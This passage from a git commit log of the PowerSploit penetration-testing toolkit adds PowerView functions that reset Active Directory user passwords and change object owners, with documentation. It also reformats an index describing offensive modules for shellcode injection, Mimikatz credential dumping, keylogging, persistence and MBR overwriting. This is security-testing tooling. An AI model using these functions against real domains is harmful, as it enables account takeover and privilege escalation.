'Recon/Get-WMIProcess.md' + - Find-InterestingFile: 'Recon/Find-InterestingFile.md' + - Find-DomainUserLocation: 'Recon/Find-DomainUserLocation.md' + - Find-DomainProcess: 'Recon/Find-DomainProcess.md' + - Find-DomainUserEvent: 'Recon/Find-DomainUserEvent.md' + - Find-DomainShare: 'Recon/Find-DomainShare.md' + - Find-InterestingDomainShareFile: 'Recon/Find-InterestingDomainShareFile.md' + - Find-LocalAdminAccess: 'Recon/Find-LocalAdminAccess.md' + - Find-DomainLocalGroupMember: 'Recon/Find-DomainLocalGroupMember.md' + - Get-DomainTrust: 'Recon/Get-DomainTrust.md' + - Get-ForestTrust: 'Recon/Get-ForestTrust.md' + - Get-DomainForeignUser: 'Recon/Get-DomainForeignUser.md' + - Get-DomainForeignGroupMember: 'Recon/Get-DomainForeignGroupMember.md' + - Get-DomainTrustMapping: 'Recon/Get-DomainTrustMapping.md' + - Get-ComputerDetails: 'Recon/Get-ComputerDetails.md' + - Get-HttpStatus: 'Recon/Get-HttpStatus.md' + - Invoke-Portscan: 'Recon/Invoke-Portscan.md' + - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md' - About: - License: 'LICENSE.md' \ No newline at end of file -- cgit v1.2.3 From f4f5fb1460a8163e333c9e5462df6d3ab27a53a6 Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Tue, 13 Dec 2016 16:00:28 -0500 Subject: Added Set-DomainUserPassword to reset a particular user's password. Reformatted documentation. --- README.md | 2 +- Recon/PowerView.ps1 | 113 ++++++++++++++++++ Recon/README.md | 1 + Recon/Recon.psd1 | 1 + docs/Recon/Set-DomainUserPassword.md | 127 ++++++++++++++++++++ docs/Recon/index.md | 14 --- docs/index.md | 223 +++++++++-------------------------- mkdocs.yml | 1 + 8 files changed, 298 insertions(+), 184 deletions(-) create mode 100755 docs/Recon/Set-DomainUserPassword.md (limited to 'docs/Recon') diff --git a/README.md b/README.md index c348b9e..60ac90f 100644 --- a/README.md +++ b/README.md @@ -132,7 +132,7 @@ Displays Windows vault credential objects including cleartext web credentials. Generates a full-memory minidump of a process. -#### 'Get-MicrophoneAudio' +#### `Get-MicrophoneAudio` Records audio from system microphone and saves to disk diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1 index 32aa10f..5d404f3 100755 --- a/Recon/PowerView.ps1 +++ b/Recon/PowerView.ps1 @@ -4894,6 +4894,119 @@ http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices- } +function Set-DomainUserPassword { +<# +.SYNOPSIS + +Sets the password for a given user identity and returns the user object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. + +.PARAMETER Identity + +A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. + +.PARAMETER AccountPassword + +Specifies the password to reset the target user's to. Mandatory. + +.PARAMETER Domain + +Specifies the domain to use to search for the user identity, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword + +Resets the password for 'andy' to the password specified. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred + +Resets the password for 'andy' usering the alternate credentials specified. + +.OUTPUTS + +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('UserName', 'UserIdentity', 'User')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ 'Identity' = $Identity } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity) + + if ($User) { + Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'" + try { + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + + $Null = $User.Save() + Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset" + $User + } + catch { + Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_" + } + } + else { + Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'" + } + } +} + + function Get-DomainUserEvent { <# .SYNOPSIS diff --git a/Recon/README.md b/Recon/README.md index acc2627..7fcacc5 100644 --- a/Recon/README.md +++ b/Recon/README.md @@ -58,6 +58,7 @@ an array of hosts from the pipeline. Find-DomainObjectPropertyOutlier- inds user/group/computer objects in AD that have 'outlier' properties set Get-DomainUser - return all users or specific user objects in AD New-DomainUser - creates a new domain user (assuming appropriate permissions) and returns the user object + Set-DomainUserPassword - sets the password for a given user identity and returns the user object Get-DomainUserEvent - enumerates account logon events (ID 4624) and Logon with explicit credential events Get-DomainComputer - returns all computers or specific computer objects in AD Get-DomainObject - returns all (or specified) domain objects in AD diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 6cdcfba..7e2abcb 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -46,6 +46,7 @@ FunctionsToExport = @( 'Find-DomainObjectPropertyOutlier', 'Get-DomainUser', 'New-DomainUser', + 'Set-DomainUserPassword', 'Get-DomainUserEvent', 'Get-DomainComputer', 'Get-DomainObject', diff --git a/docs/Recon/Set-DomainUserPassword.md b/docs/Recon/Set-DomainUserPassword.md new file mode 100755 index 0000000..1712294 --- /dev/null +++ b/docs/Recon/Set-DomainUserPassword.md @@ -0,0 +1,127 @@ +# Set-DomainUserPassword + +## SYNOPSIS +Sets the password for a given user identity and returns the user object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +Set-DomainUserPassword [-Identity] -AccountPassword [-Domain ] + [-Credential ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. +The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword + +Resets the password for 'andy' to the password specified. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred + +Resets the password for 'andy' usering the alternate credentials specified. + +## PARAMETERS + +### -Identity +A user SamAccountName (e.g. +User1), DistinguishedName (e.g. +CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: UserName, UserIdentity, User + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AccountPassword +Specifies the password to reset the target user's to. +Mandatory. + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: Password + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for the user identity, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.UserPrincipal + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/index.md b/docs/Recon/index.md index acc2627..b3eca5c 100644 --- a/docs/Recon/index.md +++ b/docs/Recon/index.md @@ -1,17 +1,3 @@ -To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. - -The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" -The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" - -To use the module, type `Import-Module Recon` - -To see the commands imported, type `Get-Command -Module Recon` - -For help on each individual command, Get-Help is your friend. - -Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. - - ## PowerView PowerView is a PowerShell tool to gain network situational awareness on diff --git a/docs/index.md b/docs/index.md index c348b9e..67ddcbc 100644 --- a/docs/index.md +++ b/docs/index.md @@ -1,189 +1,74 @@ -### PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: +## Overview +PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. -## CodeExecution +### CodeExecution +Execute code on a target machine. -**Execute code on a target machine.** + Invoke-DllInjection - Injects a Dll into the process ID of your choosing. + Invoke-ReflectivePEInjection - Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + Invoke-Shellcode - Injects shellcode into the process ID of your choosing or within PowerShell locally. + Invoke-WmiCommand - Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel -#### `Invoke-DllInjection` +### ScriptModification +Modify and/or prepare scripts for execution on a compromised machine. -Injects a Dll into the process ID of your choosing. + Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + Out-EncryptedScript - Encrypts text files/scripts. + Remove-Comments - Strips comments and extra whitespace from a script. -#### `Invoke-ReflectivePEInjection` +### Persistence -Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. +Add persistence capabilities to a PowerShell script. -#### `Invoke-Shellcode` + New-UserPersistenceOption - Configure user-level persistence options for the Add-Persistence function. + New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function. + Add-Persistence - Add persistence capabilities to a script. + Install-SSP - Installs a security support provider (SSP) dll. + Get-SecurityPackages - Enumerates all loaded security packages (SSPs). -Injects shellcode into the process ID of your choosing or within PowerShell locally. +### AntivirusBypass +AV doesn't stand a chance against PowerShell! -#### `Invoke-WmiCommand` + Find-AVSignature - Locates single Byte AV signatures utilizing the same method as DSplit from "class101". -Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. +### Exfiltration +All your data belong to me! -## ScriptModification + Invoke-TokenManipulation - Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + Invoke-CredentialInjection - Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). + Invoke-NinjaCopy - Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. + Invoke-Mimikatz - Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. + Get-Keystrokes - Logs keys pressed, time and the active window. + Get-GPPPassword - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. + Get-GPPAutologon - Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. + Get-TimedScreenshot - A function that takes screenshots at a regular interval and saves them to a folder. + New-VolumeShadowCopy - Creates a new volume shadow copy. + Get-VolumeShadowCopy - Lists the device paths of all local volume shadow copies. + Mount-VolumeShadowCopy - Mounts a volume shadow copy. + Remove-VolumeShadowCopy - Deletes a volume shadow copy. + Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials. + Out-Minidump - Generates a full-memory minidump of a process. + Get-MicrophoneAudio - Records audio from system microphone and saves to disk. -**Modify and/or prepare scripts for execution on a compromised machine.** +### Mayhem +Cause general mayhem with PowerShell. -#### `Out-EncodedCommand` + Set-MasterBootRecord - Proof of concept code that overwrites the master boot record with the message of your choice. + Set-CriticalProcess - Causes your machine to blue screen upon exiting PowerShell. -Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. +### Privesc +Tools to help with escalating privileges on a target, including PowerUp. -#### `Out-CompressedDll` + PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. -Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. +### Recon +Tools to aid in the reconnaissance phase of a penetration test, including PowerView. -#### `Out-EncryptedScript` - -Encrypts text files/scripts. - -#### `Remove-Comments` - -Strips comments and extra whitespace from a script. - -## Persistence - -**Add persistence capabilities to a PowerShell script** - -#### `New-UserPersistenceOption` - -Configure user-level persistence options for the Add-Persistence function. - -#### `New-ElevatedPersistenceOption` - -Configure elevated persistence options for the Add-Persistence function. - -#### `Add-Persistence` - -Add persistence capabilities to a script. - -#### `Install-SSP` - -Installs a security support provider (SSP) dll. - -#### `Get-SecurityPackages` - -Enumerates all loaded security packages (SSPs). - -## AntivirusBypass - -**AV doesn't stand a chance against PowerShell!** - -#### `Find-AVSignature` - -Locates single Byte AV signatures utilizing the same method as DSplit from "class101". - -## Exfiltration - -**All your data belong to me!** - -#### `Invoke-TokenManipulation` - -Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. - -#### `Invoke-CredentialInjection` - -Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). - -#### `Invoke-NinjaCopy` - -Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. - -#### `Invoke-Mimikatz` - -Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. - -#### `Get-Keystrokes` - -Logs keys pressed, time and the active window. - -#### `Get-GPPPassword` - -Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. - -#### `Get-GPPAutologon` - -Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. - -#### `Get-TimedScreenshot` - -A function that takes screenshots at a regular interval and saves them to a folder. - -#### `New-VolumeShadowCopy` - -Creates a new volume shadow copy. - -#### `Get-VolumeShadowCopy` - -Lists the device paths of all local volume shadow copies. - -#### `Mount-VolumeShadowCopy` - -Mounts a volume shadow copy. - -#### `Remove-VolumeShadowCopy` - -Deletes a volume shadow copy. - -#### `Get-VaultCredential` - -Displays Windows vault credential objects including cleartext web credentials. - -#### `Out-Minidump` - -Generates a full-memory minidump of a process. - -#### 'Get-MicrophoneAudio' - -Records audio from system microphone and saves to disk - -## Mayhem - -**Cause general mayhem with PowerShell.** - -#### `Set-MasterBootRecord` - -Proof of concept code that overwrites the master boot record with the - message of your choice. - -#### `Set-CriticalProcess` - -Causes your machine to blue screen upon exiting PowerShell. - -## Privesc - -**Tools to help with escalating privileges on a target.** - -#### `PowerUp` - -Clearing house of common privilege escalation checks, along with some weaponization vectors. - -## Recon - -**Tools to aid in the reconnaissance phase of a penetration test.** - -#### `Invoke-Portscan` - -Does a simple port scan using regular sockets, based (pretty) loosely on nmap. - -#### `Get-HttpStatus` - -Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. - -#### `Invoke-ReverseDnsLookup` - -Scans an IP address range for DNS PTR records. - -#### `PowerView` - -PowerView is series of functions that performs network and Windows domain enumeration and exploitation. - -## Recon\Dictionaries - -**A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.** - -* admin.txt - -* generic.txt - -* sharepoint.txt - + Invoke-Portscan - Does a simple port scan using regular sockets, based (pretty) loosely on nmap. + Get-HttpStatus - Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. + Invoke-ReverseDnsLookup - Scans an IP address range for DNS PTR records. + PowerView - PowerView is series of functions that performs network and Windows domain enumeration and exploitation. ## License diff --git a/mkdocs.yml b/mkdocs.yml index fb9ad52..fcaef8d 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -29,6 +29,7 @@ pages: - Find-DomainObjectPropertyOutlier: 'Recon/Find-DomainObjectPropertyOutlier.md' - Get-DomainUser: 'Recon/Get-DomainUser.md' - New-DomainUser: 'Recon/New-DomainUser.md' + - Set-DomainUserPassword: 'Recon/Set-DomainUserPassword.md' - Get-DomainUserEvent: 'Recon/Get-DomainUserEvent.md' - Get-DomainComputer: 'Recon/Get-DomainComputer.md' - Get-DomainObject: 'Recon/Get-DomainObject.md' -- cgit v1.2.3 From f00e3fc6c436f372953f48de1a8e2771b13844ec Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Tue, 13 Dec 2016 17:21:10 -0500 Subject: Added Set-DomainObjectOwner to modify an object's owner Modified Convert-LDAPProperty to break out sections of ntsecuritydescriptor --- Recon/PowerView.ps1 | 214 +++++++++++++++++++++++++++++--- Recon/Recon.psd1 | 1 + docs/Recon/Set-DomainObjectOwner.md | 234 +++++++++++++++++++++++++++++++++++ docs/Recon/Set-DomainUserPassword.md | 2 +- 4 files changed, 431 insertions(+), 20 deletions(-) create mode 100755 docs/Recon/Set-DomainObjectOwner.md (limited to 'docs/Recon') diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1 index 5d404f3..cb2af32 100755 --- a/Recon/PowerView.ps1 +++ b/Recon/PowerView.ps1 @@ -2741,7 +2741,20 @@ A custom PSObject with LDAP hashtable properties translated. $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid } elseif ($_ -eq 'ntsecuritydescriptor') { - $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 + # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 + $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 + if ($Descriptor.Owner) { + $ObjectProperties['Owner'] = $Descriptor.Owner + } + if ($Descriptor.Group) { + $ObjectProperties['Group'] = $Descriptor.Group + } + if ($Descriptor.DiscretionaryAcl) { + $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl + } + if ($Descriptor.SystemAcl) { + $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl + } } elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { # convert timestamps @@ -4898,7 +4911,7 @@ function Set-DomainUserPassword { <# .SYNOPSIS -Sets the password for a given user identity and returns the user object. +Sets the password for a given user identity. Author: Will Schroeder (@harmj0y) License: BSD 3-Clause @@ -4994,7 +5007,6 @@ http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices- $Null = $User.Save() Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset" - $User } catch { Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_" @@ -6186,22 +6198,10 @@ Get-DomainUser -Identity testuser -Properties scriptpath scriptpath ---------- \\EVIL\program2.exe - -.OUTPUTS - -PowerView.ADObject - -Custom PSObject with translated AD object property fields, if -PassThru is enabled. - -PowerView.ADObject.Raw - -The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled. #> [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] - [OutputType('PowerView.ADObject')] - [OutputType('PowerView.ADObject.Raw')] [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] @@ -6253,10 +6253,6 @@ The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled [Int] $ServerTimeLimit, - [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] - [String] - $SecurityMasks, - [Switch] $Tombstone, @@ -6336,6 +6332,186 @@ The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled } +function Set-DomainObjectOwner { +<# +.SYNOPSIS + +Modifies the owner for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Retrieves the Active Directory object specified by -Identity by splatting to +Get-DomainObject, returning the raw searchresult object. Retrieves the raw +directoryentry for the object, and sets the object owner to -OwnerIdentity. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the AD object to set the owner for. + +.PARAMETER OwnerIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the owner to set for -Identity. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y + +Set the owner of 'dfm' in the current domain to 'harmj0y'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred + +Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Owner')] + [String] + $OwnerIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid + if ($OwnerSid) { + $OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid + } + else { + Write-Warning "[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'" + } + } + + PROCESS { + if ($OwnerIdentityReference) { + $SearcherArguments['Raw'] = $True + $SearcherArguments['Identity'] = $Identity + + # splat the appropriate arguments to Get-DomainObject + $RawObject = Get-DomainObject @SearcherArguments + + ForEach ($Object in $RawObject) { + try { + Write-Verbose "[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'" + $Entry = $RawObject.GetDirectoryEntry() + $Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference) + $Entry.PsBase.CommitChanges() + } + catch { + Write-Warning "[Set-DomainObjectOwner] Error setting owner: $_" + } + } + } + } +} + + function Get-DomainObjectAcl { <# .SYNOPSIS diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 7e2abcb..71667c0 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -51,6 +51,7 @@ FunctionsToExport = @( 'Get-DomainComputer', 'Get-DomainObject', 'Set-DomainObject', + 'Set-DomainObjectOwner', 'Get-DomainObjectAcl', 'Add-DomainObjectAcl', 'Find-InterestingDomainAcl', diff --git a/docs/Recon/Set-DomainObjectOwner.md b/docs/Recon/Set-DomainObjectOwner.md new file mode 100755 index 0000000..0da8819 --- /dev/null +++ b/docs/Recon/Set-DomainObjectOwner.md @@ -0,0 +1,234 @@ +# Set-DomainObjectOwner + +## SYNOPSIS +Modifies the owner for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Set-DomainObjectOwner [-Identity] -OwnerIdentity [-Domain ] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Retrieves the Active Directory object specified by -Identity by splatting to +Get-DomainObject, returning the raw searchresult object. +Retrieves the raw +directoryentry for the object, and sets the object owner to -OwnerIdentity. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y +``` + +Set the owner of 'dfm' in the current domain to 'harmj0y'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred + +Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials. + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the AD object to set the owner for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OwnerIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 